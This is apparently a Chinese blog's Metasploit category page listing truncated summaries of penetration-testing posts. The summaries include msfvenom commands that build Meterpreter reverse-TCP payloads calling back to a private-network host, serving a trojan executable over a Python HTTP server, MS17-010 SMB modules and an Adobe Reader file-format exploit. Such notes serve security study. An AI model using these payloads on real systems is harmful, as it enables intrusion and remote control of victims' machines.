随笔分类 - Metaspolit
摘要:获得一个较低权限的session 用msf生成一个payload msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.171.129 LPORT=4444 -b "\00" -e x8
阅读全文
摘要:命令: 同网段主机探测:nmap -Pn 192.168.171.129/24 MSF先得到一个session search ms17-010 用于验证是否存在漏洞 auxiliary/admin/smb/ms17_010_command auxiliary/scanner/smb/smb_ms17
阅读全文
摘要:反弹连接木马获取shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.129 LPORT=4444 -f exe > lao.exe python -m SimpleHTTPServer 8080 //通过开启http
阅读全文
摘要:Adobe_utilprintf 应用条件: adobe reader 8.1.2 ,XP SP3 准备payload use exploit/windows/fileformat/adobe_utilprintf show options # 8443端口 set payload windows/
阅读全文